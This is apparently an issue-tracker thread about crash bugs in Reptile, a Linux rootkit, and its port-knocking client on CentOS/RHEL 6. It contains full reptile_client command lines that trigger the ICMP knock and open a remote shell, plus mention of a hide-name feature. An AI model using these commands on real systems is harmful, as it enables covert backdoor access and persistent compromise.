Some bug may cause the crash.

[Asuings]

Tested on CentOS 6 x64 (using all the default setting)

1. set the port-knocking auth token as "hax0r" use the client as: ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r -w s3cr3t then you will get a shell but ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r123 -w s3cr3t then you can still get a shell if you try that ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0rasuhuicsashai155 -w s3cr3t (right Auth token +some random chars ) the system will crash. 2.if you set the auth token a bit longer than "hax0r" ,such as "hax0rchsausau" then the port-knocking will not working. 3.if you set the Hide name a bit longer than "reptile",the port-knocking will not working.

Reptile may have chance to Crash a RHEL6 using all the default setting,sorry a forgot to log the error code. Good luck!

[f0rb1dd3n]

Thanks for reporting that! ;)

I will consider that for the next commits. I will just delay a little cause I am little busy. But I know how to fix this.

thx

[f0rb1dd3n]

@Asuings, I updated, can you test if this still can get a crash? Thx

[corefx]

Hello, I have tested Reptile with the latest commits on Centos 6.9 (x64) and I don't get any crashes on the server side if use long auth token or long hide name but I get " buffer overflow detected : ./reptile_client terminated" error if I use command like this:

./reptile_client -t 192.168.1.117 -x icmp -s 192.168.0.2 -l 192.168.1.107 -p 4444 -w s3cr3t -k hax0raaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

This is the only server side crash I got on the Centos 6.9

[f0rb1dd3n]

I updated Reptile and I think these bugs doesn't exists. So, I will close this issue and if another bug appear, we can reopen this!

;)